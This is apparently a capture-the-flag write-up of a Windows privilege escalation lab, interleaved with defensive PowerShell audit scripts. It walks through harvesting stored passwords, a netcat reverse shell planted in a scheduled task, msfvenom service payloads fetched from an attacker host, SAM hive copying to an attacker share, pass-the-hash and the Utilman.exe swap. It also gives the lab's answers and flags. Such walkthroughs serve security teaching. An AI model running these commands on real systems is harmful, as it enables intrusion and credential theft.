Task 2 Windows Privilege Escalation

Weaknesses that can be abused for privilege escalation:

  • Misconfigurations on Windows services or scheduled tasks
  • Excessive privileges assigned to our account
  • Vulnerable software
  • Missing Windows security patches

Question: Users that can change system configurations are part of which group?
Answer: Administrators

Question: The SYSTEM account has more privileges than the Administrator user (aye/nay)
Answer: aye

Task 3 Harvesting Passwords from Usual Spots

Question: A password for the julia.jones user has been left in the PowerShell history. What is the password?
Answer: ZuperCkretPa5z

C:\Users\thm-unpriv>type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
ls
whoami
whoami /priv
whoami /group
whoami /groups
cmdkey /?
cmdkey /add:thmdc.local /user:julia.jones /pass:ZuperCkretPa5z
cmdkey /list
cmdkey /delete:thmdc.local
cmdkey /list
runas /?
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cd c:\
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Question: A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?
Answer: 098n0x35skjD3

C:\Users\thm-unpriv>type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
                <add connectionStringName="LocalSqlServer" maxEventDetailsLength="1073741823" buffer="false" bufferMode="Notification" name="SqlWebEventProvider" type="System.Web.Management.SqlWebEventProvider,System.Web,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a" />
                    <add connectionStringName="LocalSqlServer" name="AspNetSqlPersonalizationProvider" type="System.Web.UI.WebControls.WebParts.SqlPersonalizationProvider, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
    <connectionStrings>
        <add connectionString="Server=thm-db.local;Database=thm-sekure;User ID=db_admin;Password=098n0x35skjD3" name="THM-DB" />
    </connectionStrings>

Question: There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.
Answer: THM{WHAT_IS_MY_PASSWORD}

C:\Users\thm-unpriv>whoami
wprivesc1\thm-unpriv

C:\Users\thm-unpriv>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=WPRIVESC1\mike.katz
    Type: Domain Password
    User: WPRIVESC1\mike.katz

C:\Users\thm-unpriv>runas /savecred /user:mike.katz cmd.exe
Attempting to start cmd.exe as user "WPRIVESC1\mike.katz" ...

Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
wprivesc1\mike.katz

C:\Windows\system32>dir C:\Users\mike.katz\Desktop
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\mike.katz\Desktop

05/04/2022  05:17 AM    <DIR>          .
05/04/2022  05:17 AM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
05/04/2022  05:17 AM                24 flag.txt
               3 File(s)          1,105 bytes
               2 Dir(s)  14,820,655,104 bytes free

C:\Windows\system32>type C:\Users\mike.katz\Desktop\flag.txt
THM{WHAT_IS_MY_PASSWORD}

Question: Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?
Answer: CoolPass2021

C:\Users\thm-unpriv>reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\My%20ssh%20server
    ProxyExcludeList    REG_SZ
    ProxyDNS    REG_DWORD    0x1
    ProxyLocalhost    REG_DWORD    0x0
    ProxyMethod    REG_DWORD    0x0
    ProxyHost    REG_SZ    proxy
    ProxyPort    REG_DWORD    0x50
    ProxyUsername    REG_SZ    thom.smith
    ProxyPassword    REG_SZ    CoolPass2021
    ProxyTelnetCommand    REG_SZ    connect %host %port\n
    ProxyLogToTerm    REG_DWORD    0x1

End of search: 10 match(es) found.
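
As an added example (not part of the original write-up), the following PowerShell script audits the same four spots this task reads credentials from and reports where a secret is stored without printing it, so an administrator can clean them up. It assumes PowerShell 5.1 or later and is run as the user whose profile is being checked; the web.config search roots are an assumption.

```powershell
# Added example (not the write-up's code): find credential leftovers in the
# places Task 3 harvests from, reporting locations but redacting the secrets.
function Get-CredentialLeftovers {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. PSReadline history keeps every typed command, including cmdkey /add ... /pass:.
    $history = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
    if (Test-Path -LiteralPath $history) {
        Get-Content -LiteralPath $history | Select-String -Pattern '/pass:|-password|net user|runas ' |
            ForEach-Object {
                $redacted = $_.Line -replace '(/pass:)\S+', '$1<redacted>'
                $findings.Add("history line $($_.LineNumber): $redacted")
            }
    }

    # 2. web.config connection strings that embed a password (the db_admin case).
    #    Search roots are an assumption: the .NET machine configs and the IIS root.
    $roots = "$env:windir\Microsoft.NET\Framework64", "$env:windir\Microsoft.NET\Framework", 'C:\inetpub'
    foreach ($root in $roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        foreach ($file in Get-ChildItem -LiteralPath $root -Filter web.config -Recurse -ErrorAction SilentlyContinue) {
            try { [xml]$cfg = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction Stop } catch { continue }
            foreach ($cs in $cfg.configuration.connectionStrings.add) {
                $value = $cs.GetAttribute('connectionString')
                if ($value -match '(?i)(password|pwd)\s*=') {
                    $server = if ($value -match '(?i)(server|data source)\s*=\s*([^;]+)') { $Matches[2] } else { '?' }
                    $findings.Add("web.config $($file.FullName): '$($cs.GetAttribute('name'))' stores a clear-text password for $server")
                }
            }
        }
    }

    # 3. PuTTY saved sessions keep proxy credentials in clear text under HKCU.
    $putty = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
    if (Test-Path $putty) {
        foreach ($key in Get-ChildItem $putty) {
            $p = Get-ItemProperty -LiteralPath $key.PSPath
            if ($p.ProxyPassword) {
                $findings.Add("putty session '$($key.PSChildName)': proxy password saved for $($p.ProxyUsername)")
            }
        }
    }

    # 4. Credentials saved with cmdkey let anyone in this profile use runas /savecred.
    foreach ($t in (cmdkey /list | Select-String -Pattern '^\s*Target:')) {
        $findings.Add("cmdkey: $($t.Line.Trim())")
    }
    return $findings
}

$found = @(Get-CredentialLeftovers)
if ($found.Count -eq 0) { 'No credential leftovers found.' } else { $found }
```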

Task 4 Other Quick Wins

Question: What is the taskusr1 flag?
Answer: THM{TASK_COMPLETED}

First of all, check the scheduled tasks with the schtasks command:

C:\Users\thm-unpriv>whoami
wprivesc1\thm-unpriv

C:\Users\thm-unpriv>schtasks | findstr "vuln"
vulntask                                 N/A                    Ready

C:\Users\thm-unpriv> schtasks /query /tn vulntask /fo list /v

Folder: \
HostName:                             WPRIVESC1
TaskName:                             \vulntask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        9/20/2023 4:50:15 PM
Last Result:                          0
Author:                               WPRIVESC1\Administrator
Task To Run:                          C:\tasks\schtask.bat
Start In:                             N/A
Comment:                              N/A
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          taskusr1
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

C:\Users\thm-unpriv>echo c:\tools\nc64.exe -e cmd.exe 10.11.52.229 4444 > C:\tasks\schtask.bat

The "Task To Run" parameter is C:\tasks\schtask.bat. We could modify the .bat file and insert any payload to spawn a reverse shell; here I've used C:\tools\nc64.exe.

Then start a listener on the attacker machine:

nc -lvnp 4444

Start the task manually:

C:\Users\thm-unpriv>schtasks /run /tn vulntask
SUCCESS: Attempted to run the scheduled task "vulntask".

Receive the reverse shell with taskusr1 privileges as expected:

❯ ncat -lvnp 4444
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.201.216:49789.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
wprivesc1\taskusr1

C:\Windows\system32>dir C:\Users\taskusr1\Desktop\
dir C:\Users\taskusr1\Desktop\
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\taskusr1\Desktop

05/03/2022  01:00 PM    <DIR>          .
05/03/2022  01:00 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
05/03/2022  01:00 PM                19 flag.txt
               3 File(s)          1,100 bytes
               2 Dir(s)  15,015,317,504 bytes free

C:\Windows\system32>type C:\Users\taskusr1\Desktop\flag.txt
type C:\Users\taskusr1\Desktop\flag.txt
THM{TASK_COMPLETED}

Task 5 Abusing Service Misconfigurations

Insecure Permissions on Service Executable

Question: Get the flag on svcusr1's desktop.

Check the service properties and permissions:

C:\Users\thm-unpriv>sc qc windowsscheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: windowsscheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\PROGRA~2\SYSTEM~1\WService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : System Scheduler Service
        DEPENDENCIES       :
        SERVICE_START_NAME : .\svcusr1

C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(M)
                                  NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)
                                  BUILTIN\Users:(I)(RX)
                                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                  APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

The service installed by the vulnerable software runs as svcusr1, and its executable is C:\PROGRA~2\SYSTEM~1\WService.exe. The Everyone group has modify (M) permissions on that executable.

This means I could simply overwrite it with any payload of my choice, and the service would execute it with the privileges of the configured user account (svcusr1).

Generate an exe-service payload using msfvenom and serve it through a Python web server:

❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.52.229 LPORT=22002 -f exe-service -o rev-svc.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe-service file: 48640 bytes
Saved as: rev-svc.exe

❯ python -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...

Then pull the payload with PowerShell and replace the service executable with it:

PS C:\Users\thm-unpriv> wget http://10.11.52.229/rev-svc.exe -O rev-svc.exe
PS C:\Users\thm-unpriv>move C:\PROGRA~2\SYSTEM~1\WService.exe C:\PROGRA~2\SYSTEM~1\WService.exe.bak
        1 file(s) moved.

PS C:\Users\thm-unpriv>move rev-svc.exe C:\PROGRA~2\SYSTEM~1\WService.exe
        1 file(s) moved.

Grant full permissions to the Everyone group:

C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe NT AUTHORITY\SYSTEM:(F)
                                  BUILTIN\Administrators:(F)
                                  WPRIVESC1\thm-unpriv:(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe /grant Everyone:F
processed file: C:\PROGRA~2\SYSTEM~1\WService.exe
Successfully processed 1 files; Failed processing 0 files

C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(F)
                                  NT AUTHORITY\SYSTEM:(F)
                                  BUILTIN\Administrators:(F)
                                  WPRIVESC1\thm-unpriv:(F)
                                  Everyone:(I)(M)
                                  NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)
                                  BUILTIN\Users:(I)(RX)
                                  WPRIVESC1\thm-unpriv:(I)(F)
                                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                  APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

Start a listener on the attack machine and restart the service on the target:

C:\> sc stop windowsscheduler
C:\> sc start windowsscheduler
❯ ncat -lvnp 22002
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:22002
Ncat: Listening on 0.0.0.0:22002
Ncat: Connection from 10.10.2.92:49853.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
wprivesc1\svcusr1

C:\Windows\system32>type C:\Users\svcusr1\Desktop\flag.txt
type C:\Users\svcusr1\Desktop\flag.txt
THM{AT_YOUR_SERVICE}

Answer: THM{AT_YOUR_SERVICE}

Unquoted Service Paths

Question: Get the flag on svcusr2's desktop.

Regenerate an exe-service payload, upload it again and start a listener on the attack machine.

Find a service whose binary path is not properly quoted:

PS C:\Users\thm-unpriv\Desktop> sc.exe qc "disk sorter enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: disk sorter enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : .\svcusr2

Because the path is unquoted, the service control manager tries C:\MyPrograms\Disk.exe before C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe. Move the payload to C:\MyPrograms\Disk.exe and grant Everyone full permissions on it. Then restart the service to receive the reverse shell.

PS C:\Users\thm-unpriv\Desktop> move .\svc2.exe C:\MyPrograms\Disk.exe
PS C:\Users\thm-unpriv\Desktop> icacls C:\MyPrograms\Disk.exe /grant Everyone:F
processed file: C:\MyPrograms\Disk.exe
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\thm-unpriv\Desktop> sc.exe stop "disk sorter enterprise"
[SC] ControlService FAILED 1062:

The service has not been started.

PS C:\Users\thm-unpriv\Desktop> sc.exe start "disk sorter enterprise"

SERVICE_NAME: disk sorter enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 4932
        FLAGS              :
❯ ncat -lvnp 22003
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:22003
Ncat: Listening on 0.0.0.0:22003
Ncat: Connection from 10.10.2.92:49900.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
wprivesc1\svcusr2

C:\Windows\system32>type C:\Users\svcusr2\Desktop\flag.txt
type C:\Users\svcusr2\Desktop\flag.txt
THM{QUOTES_EVERYWHERE}
C:\Windows\system32>

Answer: THM{QUOTES_EVERYWHERE}

Insecure Service Permissions

Question: Get the flag on the Administrator's desktop.

Use accesschk64.exe from the Sysinternals suite to view the DACL (Discretionary Access Control List) of thmservice:

PS C:\Users\thm-unpriv\Desktop> cd C:\tools\AccessChk\
PS C:\tools\AccessChk> .\accesschk64.exe -qlc thmservice

Accesschk v6.14 - Reports effective permissions for securable objects
Copyright © 2006-2021 Mark Russinovich
Sysinternals - www.sysinternals.com

thmservice
  DESCRIPTOR FLAGS:
      [SE_DACL_PRESENT]
      [SE_SACL_PRESENT]
      [SE_SELF_RELATIVE]
  OWNER: NT AUTHORITY\SYSTEM
  [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_PAUSE_CONTINUE
        SERVICE_START
        SERVICE_STOP
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [1] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  [2] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\INTERACTIVE
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [3] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SERVICE
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
        SERVICE_ALL_ACCESS

Here we can see that the BUILTIN\Users group has the SERVICE_ALL_ACCESS permission, which means any local user can reconfigure the service.

Regenerate an exe-service payload, upload it again and start a listener on the attack machine. Also, grant Everyone full permissions on the payload.

PS C:\tools\AccessChk> cd C:\Users\thm-unpriv\Desktop
PS C:\Users\thm-unpriv\Desktop> wget http://10.11.52.229/svc3.exe -O svc3.exe
PS C:\Users\thm-unpriv\Desktop> ls

    Directory: C:\Users\thm-unpriv\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/4/2022   8:15 AM           1387 ProcessHacker.lnk
-a----        9/23/2023   7:19 AM          48640 svc3.exe

PS C:\Users\thm-unpriv\Desktop> icacls .\svc3.exe /grant Everyone:F
processed file: .\svc3.exe
Successfully processed 1 files; Failed processing 0 files

Reconfigure the vulnerable "thmservice" and start it:

PS C:\Users\thm-unpriv\Desktop> sc.exe config THMService binPath= "C:\Users\thm-unpriv\Desktop\svc3.exe" obj= LocalSystem
[SC] ChangeServiceConfig SUCCESS
PS C:\Users\thm-unpriv\Desktop> sc.exe start THMService

SERVICE_NAME: THMService
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 756
        FLAGS              :
❯ ncat -lvnp 22004
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:22004
Ncat: Listening on 0.0.0.0:22004
Ncat: Connection from 10.10.2.92:49908.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\flag.txt
type C:\Users\Administrator\Desktop\flag.txt
THM{INSECURE_SVC_CONFIG}
C:\Windows\system32>

Answer: THM{INSECURE_SVC_CONFIG}
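
As an added example that is not the write-up's or TryHackMe's code, this PowerShell script audits a host for the misconfigurations exploited by hand in Tasks 4 and 5: a scheduled-task or service binary writable by low-privileged principals, an unquoted service path containing spaces, and a service DACL that grants reconfiguration rights to non-administrators. It assumes PowerShell 5.1+, sc.exe, the ScheduledTasks module and an elevated session for complete results; the set of trusted SIDs is an assumption.

```powershell
# Added example (not the write-up's code): audit scheduled tasks and services for
# the Task 4 / Task 5 misconfigurations. Run elevated for a complete view.

# Principals expected to have write access to service binaries and DACLs (assumption).
$trustedSids = @('S-1-5-18', 'S-1-5-32-544', 'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464')  # SYSTEM, Administrators, TrustedInstaller
# Service rights that allow takeover: SERVICE_CHANGE_CONFIG 0x2, WRITE_DAC 0x40000, WRITE_OWNER 0x80000,
# GENERIC_ALL 0x10000000, GENERIC_WRITE 0x40000000. SERVICE_ALL_ACCESS (0xF01FF) contains 0x2.
$takeoverMask = 0x500C0002

function ConvertTo-SidString($identity) {
    try { $identity.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { "$identity" }
}
function ConvertTo-AccountName($sid) {
    try { $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $sid.Value }
}
function Get-ExecutablePath([string]$commandLine) {
    # "C:\Program Files\X\svc.exe" -arg -> C:\Program Files\X\svc.exe; an unquoted path stops at .exe
    if ($commandLine -match '^"([^"]+)"') { return $Matches[1] }
    if ($commandLine -match '^(.*?\.exe)') { return $Matches[1] }
    return ($commandLine -split ' ')[0]
}
# Allow-ACEs on a file that let a principal outside $trustedSids change its contents.
function Get-UntrustedWriters([string]$file) {
    if (-not $file -or -not (Test-Path -LiteralPath $file)) { return @() }
    (Get-Acl -LiteralPath $file).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $trustedSids -notcontains (ConvertTo-SidString $_.IdentityReference) -and
        $_.FileSystemRights.ToString() -match '\b(FullControl|Modify|Write|WriteData|AppendData|TakeOwnership|ChangePermissions)\b'
    } | ForEach-Object { "$($_.IdentityReference) ($($_.FileSystemRights))" }
}

function Test-PrivescMisconfig {
    $issues = New-Object System.Collections.Generic.List[string]
    # Scheduled tasks whose action binary is writable (the vulntask / schtask.bat case).
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            $exe = [System.Environment]::ExpandEnvironmentVariables((Get-ExecutablePath $action.Execute))
            foreach ($w in Get-UntrustedWriters $exe) {
                $issues.Add("task $($task.TaskName) runs as $($task.Principal.UserId): $exe writable by $w")
            }
        }
    }
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ExecutablePath $svc.PathName
        # Unquoted path with spaces (the "disk sorter enterprise" case).
        if ($svc.PathName -notmatch '^"' -and $exe -match ' ') {
            $issues.Add("service $($svc.Name): unquoted path with spaces -> $($svc.PathName)")
        }
        # Binary writable by a non-trusted principal (the WService.exe Everyone:(M) case).
        foreach ($w in Get-UntrustedWriters $exe) {
            $issues.Add("service $($svc.Name) runs as $($svc.StartName): $exe writable by $w")
        }
        # Service DACL grants reconfiguration rights (the thmservice BUILTIN\Users case).
        $sddl = (sc.exe sdshow $svc.Name 2>$null | Where-Object { $_ -match '^D:' }) -join ''
        if (-not $sddl) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace -isnot [System.Security.AccessControl.CommonAce] -or $ace.AceType -ne 'AccessAllowed') { continue }
            if ($trustedSids -contains $ace.SecurityIdentifier.Value) { continue }
            if (($ace.AccessMask -band $takeoverMask) -ne 0) {
                $issues.Add("service $($svc.Name): $(ConvertTo-AccountName $ace.SecurityIdentifier) can reconfigure it (mask 0x$('{0:X}' -f $ace.AccessMask))")
            }
        }
    }
    return $issues
}

$found = @(Test-PrivescMisconfig)
if ($found.Count -eq 0) { 'No privilege escalation misconfigurations found.' } else { $found }
```

Each finding maps to a fix the write-up's steps imply: quote the binary path, remove write access for Everyone/Users on the executable, and reset the service DACL so only administrators hold SERVICE_CHANGE_CONFIG.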

Task 6 Abusing dangerous privileges

Question: Get the flag on the Administrator's desktop.

SeBackup / SeRestore

Check the privileges on the target (open a command prompt with the "Open as administrator" option):

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

To copy files from the target machine to the attack machine, I use impacket's smbserver.py (installable with pip install impacket) to start a simple SMB server with a network share:

❯ mkdir share
❯ smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B32****EE188 V:3.0
[*] Callback added for UUID 6BFF****E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Then back up the SAM and SYSTEM registry hives (which hold the local password hashes) on the target machine, and copy these files to the attack machine.

PS C:\Windows\system32> reg save hklm\system C:\Users\THMBackup\system.hive
The operation completed successfully.
PS C:\Windows\system32> reg save hklm\sam C:\Users\THMBackup\sam.hive
The operation completed successfully.
PS C:\Windows\system32> copy C:\Users\THMBackup\sam.hive \\10.11.52.229\public\
PS C:\Windows\system32> copy C:\Users\THMBackup\system.hive \\10.11.52.229\public\

We can now use impacket's secretsdump.py to extract the Administrator's hash:

❯ secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
THMBackup:1008:aad3b435b51404eeaad3b435b51404ee:6c252027fb2022f5051e854e08023537:::
THMTakeOwnership:1009:aad3b435b51404eeaad3b435b51404ee:0af9b65477395b680b822e0b2c45b93b:::
[*] Cleaning up...

Finally, we can use impacket's psexec.py with the Administrator's NTLM hash to perform a Pass-the-Hash attack and gain access to the target machine with SYSTEM privileges:

❯ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 [email protected]
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.47.4.....
[*] Found writable share ADMIN$
[*] Uploading file NvvXZONf.exe
[*] Opening SVCManager on 10.10.47.4.....
[*] Creating service uteZ on 10.10.47.4.....
[*] Starting service uteZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\flag.txt
THM{SEFLAGPRIVILEGE}
C:\Windows\system32>

Answer: THM{SEFLAGPRIVILEGE}

SeTakeOwnership

Check the privileges on the target (open a command prompt with the "Open as administrator" option):

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                              State
============================= ======================================== ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                 Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set           Disabled

In this case we can abuse Utilman.exe to escalate privileges.

First, take ownership of Utilman.exe and grant ourselves full permissions:

PS C:\Windows\system32> takeown /f C:\Windows\System32\Utilman.exe
SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WPRIVESC2\THMTakeOwnership".

PS C:\Windows\system32> icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
processed file: C:\Windows\System32\Utilman.exe
Successfully processed 1 files; Failed processing 0 files

PS C:\Windows\system32>

Then just replace utilman.exe with a copy of cmd.exe:

PS C:\Windows\system32> copy cmd.exe Utilman.exe

We can now trigger Utilman.exe by locking the session and clicking the Ease of Access button to get a SYSTEM shell.
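
Two defender-side checks for this task, as an added example (not from the original write-up): which principals hold the backup, restore and take-ownership rights on the host, and whether Utilman.exe has been swapped for cmd.exe the way shown above. It assumes an elevated PowerShell 5.1+ session, since secedit's export needs administrator rights.

```powershell
# Added example (not the write-up's code): audit the Task 6 privileges and
# detect a replaced Utilman.exe. Requires an elevated session.
$dangerousRights = 'SeBackupPrivilege', 'SeRestorePrivilege', 'SeTakeOwnershipPrivilege'
$trustedInstallerSid = 'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'
$trustedSids = 'S-1-5-18', 'S-1-5-32-544', $trustedInstallerSid   # SYSTEM, Administrators, TrustedInstaller

function ConvertTo-SidString($identity) {
    try { $identity.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { "$identity" }
}
function ConvertTo-AccountName([string]$sidOrName) {
    # secedit writes SIDs as *S-1-5-32-551; local account names may appear as-is.
    try {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($sidOrName.TrimStart('*'))
        $sid.Translate([System.Security.Principal.NTAccount]).Value
    } catch { $sidOrName.TrimStart('*') }
}

# Who holds the dangerous user rights, from the exported local security policy.
function Get-DangerousRightHolders {
    $cfg = Join-Path $env:TEMP 'user_rights_audit.inf'
    secedit.exe /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    $holders = @{}
    foreach ($line in Get-Content -LiteralPath $cfg) {
        # [Privilege Rights] entries look like: SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
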